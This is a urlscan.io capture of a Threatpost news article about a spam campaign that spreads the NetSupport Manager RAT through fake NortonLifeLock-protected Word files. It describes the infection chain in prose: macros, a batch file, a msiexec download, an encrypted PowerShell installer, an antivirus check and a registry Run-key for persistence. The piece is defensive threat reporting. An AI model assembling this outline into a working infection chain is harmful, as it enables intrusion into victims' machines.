urlscan.io logo urlscan.io
SecurityTrails logo

threatpost.com Open in urlscan Pro
35.173.160.135  Public Scan

Back to summary
URL: https://threatpost.com/netsupport-manager-rat-nortonlifelock-docs/153387/
Submission: On November 08 via api from US — Scanned from DE

Form analysis 2 forms found in the DOM

GET https://threatpost.com/

<form class="c-site-search__form" role="search" method="get" action="https://threatpost.com/">
  <input type="text" class="c-site-search__field" name="s" placeholder="Search">
  <button type="submit" class="c-button c-button--secondary c-button--smaller c-site-search__button" value="Search"><svg class="icon fill">
      <use xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="https://threatpost.com/wp-content/themes/threatpost-2018/assets/sprite/icons.svg#icon-search"></use>
    </svg> Search</button>
  <div class="c-site-search__overlay"></div>
</form>

GET https://threatpost.com/

<form class="c-site-search__form" role="search" method="get" action="https://threatpost.com/">
  <input type="text" class="c-site-search__field" name="s" placeholder="Search">
  <button type="submit" class="c-button c-button--secondary c-button--smaller c-site-search__button" value="Search"><svg class="icon fill">
      <use xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="https://threatpost.com/wp-content/themes/threatpost-2018/assets/sprite/icons.svg#icon-search"></use>
    </svg> Search</button>
  <div class="c-site-search__overlay"></div>
</form>

Text Content

Threatpost
 * Podcasts
 * Malware
 * Vulnerabilities
 * InfoSec Insiders
 * Webinars

 * 
 * 
 * 
 * 
 * 
 * 
 * 

Search

 * Gamer Alert: Serious Nvidia Flaw Plagues Graphics DriverPrevious article
 * DoppelPaymer Ransomware Used to Steal Data from Supplier to SpaceX, TeslaNext
   article


NETSUPPORT MANAGER RAT SPREAD VIA BOGUS NORTONLIFELOCK DOCS

Author: Tara Seals
March 2, 2020 4:59 pm
2 minute read

Share this article:

 * 
 * 

The legitimate remote-access tool is being used to maliciously infect victims
and allow remote code-execution.

The legitimate remote access tool (RAT) called NetSupport Manager, used for
troubleshooting and tech support, is being converted into a malicious weapon by
cybercriminals. Researchers at Palo Alto Networks’ Unit 42 division have spotted
a spam campaign attempting to deliver a malicious Microsoft Word document that
uses the disguise of a NortonLifeLock-protected file.

NortonLifeLock is a security utility for password-protecting attachments, among
other things. If a recipient opens the document via Microsoft Office Outlook, a
prompt appears that asks users to “enable content” to open the document –
clicking “yes” executes macros.

“To the user, the document appears to contain personal information that requires
a password to view,” said researchers, in a recent analysis. “Once the document
is opened and the user clicks ‘Enable Content,’ the macro is executed and the
user is presented with a password dialog box.”



Researchers added that the password is likely provided in the body of the
phishing email, because it has to be correct; no malicious activity occurs until
the correct key is entered. Once the key is accepted, the macros create and
execute a batch file called alpaca.bat.

“The macro obfuscates all strings using multiple labels on Visual Basic for
Applications (VBA) forms, which contain two characters that are eventually
linked together to construct the final command to download and execute the RAT
on the victim,” according to Unit 42. “The command string is executed via the
VBA shell function, which [creates and executes alpaca.bat].”

The campaign uses a range of tactics to obfuscate its activity from both dynamic
and static analysis, according to researchers. For instance, the batch script
uses msiexec, which is a legitimate part of the Windows Installer service. It’s
used to download and install a Microsoft Intermediate Language (MSIL) binary
from a legitimate domain, which has been compromised. Once downloaded, the
binary will execute using the /q parameter to suppress any Windows dialogs from
the user.

The campaign also uses the PowerShell PowerSploit framework to carry out the
installation of the malicious file activity. The MSI installs a PowerShell
script in the victim’s %temp% directory named REgistryMPZMZQYVXO.ps1. This
contains another PowerShell script that is responsible for installing the
NetSupport Manager RAT onto the victim’s machine.

“The PowerShell script appears to have been generated using the open-source
script Out-EncryptedScript.ps1 from the PowerSploit framework,” according to the
analysis. “It contains a blob of data that is obfuscated via base64 and is
TripleDES encrypted with a cipher mode of Cipher Block Chain (CBC).”

The RAT installer PowerShell script interestingly aborts installation if Avast
or AVG Antivirus Software is running on the target machine. If not, it installs
12 files that make up the NetSupport Manager RAT to a random directory and sets
up persistence by creating the following registry key:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run.

“Once the main NetSupport Manager executable (presentationhost.exe) is started,
it beacons to the domain geo.netsupportsoftware[.]com to retrieve geolocation of
the host followed by an HTTP POST,” the researchers wrote.

Researchers said that the campaign is likely part of a larger offensive that
dates back to early November, with email subject lines reusing themes associated
with refunds, as well as transaction and order inquiries. The attached documents
contain the target company’s name.

“Malicious use of the NetSupport Manager remote access tool has also been
reported by both FireEye and Zscaler researchers,” researchers concluded. “While
this activity appears to be broad and at large scale, there are indications,
such as the document name, that show the actor’s attempt to provide a stronger
relationship to the target in an attempt to increase the success rate.”

Share this article:


 * Malware
 * Web Security


SUGGESTED ARTICLES


OPERATIONALIZING THREAT INTELLIGENCE WITH USER-DRIVEN AUTOMATION

To truly achieve operationalized threat intelligence, an investment must be made
in an underlying threat intelligence management platform that will enable an
organization to harness the power of threat intelligence and translate that
threat intelligence into action.

November 11, 2021


CUTTING THROUGH THE NOISE FROM DAILY ALERTS

The biggest challenge for security teams today is the quality of the threat
intelligence platforms and feeds. How much of the intel is garbage and unusable?
Threat intelligence process itself spans and feeds into many external and
internal systems and applications. Without actionable data, it is impossible to
understand the relevance and potential impact of a threat. Learn how Threat
Intelligence management plays a role to help prioritize and act fast.

August 9, 2021


IT’S NOT THE TRUMP SEX TAPE, IT’S A RAT

Criminals are using the end of the Trump presidency to deliver a new
remote-access trojan (RAT) variant disguised as a sex video of the outgoing
POTUS, researchers report.

January 6, 2021


INFOSEC INSIDER


 * SECURING YOUR MOVE TO THE HYBRID CLOUD
   
   August 1, 2022


 * WHY PHYSICAL SECURITY MAINTENANCE SHOULD NEVER BE AN AFTERTHOUGHT
   
   July 25, 2022


 * CONTI’S REIGN OF CHAOS: COSTA RICA IN THE CROSSHAIRS
   
   July 20, 2022


 * HOW WAR IMPACTS CYBER INSURANCE
   
   July 12, 2022


 * RETHINKING VULNERABILITY MANAGEMENT IN A HEIGHTENED THREAT LANDSCAPE
   
   July 11, 2022

Twitter

Tens of thousands of cameras have failed to patch a critical, 11-month-old CVE,
leaving thousands of organizations… https://t.co/iYq3WeTkbf

2 months ago

Follow @threatpost


Threatpost

The First Stop For Security News

 * Home
 * About Us
 * Contact Us
 * RSS Feeds

 * Copyright © 2022 Threatpost
 * Privacy Policy
 * Terms and Conditions

 * 
 * 
 * 
 * 
 * 
 * 
 * 


TOPICS

 * Black Hat
 * Breaking News
 * Cloud Security
 * Critical Infrastructure
 * Cryptography
 * Facebook
 * Government
 * Hacks
 * IoT
 * Malware
 * Mobile Security
 * Podcasts
 * Privacy
 * RSAC
 * Security Analyst Summit
 * Videos
 * Vulnerabilities
 * Web Security

Threatpost
 * 
 * 
 * 
 * 
 * 
 * 
 * 


TOPICS

 * Cloud Security
 * Malware
 * Vulnerabilities
 * Privacy

Show all
 * Black Hat
 * Critical Infrastructure
 * Cryptography
 * Facebook
 * Featured
 * Government
 * Hacks
 * IoT
 * Mobile Security
 * Podcasts
 * RSAC
 * Security Analyst Summit
 * Slideshow
 * Videos
 * Web Security


AUTHORS

 * Elizabeth Montalbano
 * Nate Nelson


THREATPOST

 * Home
 * About Us
 * Contact Us
 * RSS Feeds

Search

 * 
 * 
 * 
 * 
 * 
 * 
 * 

InfoSec Insider


INFOSEC INSIDER POST

Infosec Insider content is written by a trusted community of Threatpost
cybersecurity subject matter experts. Each contribution has a goal of bringing a
unique voice to important cybersecurity topics. Content strives to be of the
highest quality, objective and non-commercial.

Sponsored


SPONSORED CONTENT

Sponsored Content is paid for by an advertiser. Sponsored content is written and
edited by members of our sponsor community. This content creates an opportunity
for a sponsor to provide insight and commentary from their point-of-view
directly to the Threatpost audience. The Threatpost editorial team does not
participate in the writing or editing of Sponsored Content.

We use cookies to make your experience of our websites better. By using and
further navigating this website you accept this. Detailed information about the
use of cookies on this website is available by clicking on more information.

ACCEPT AND CLOSE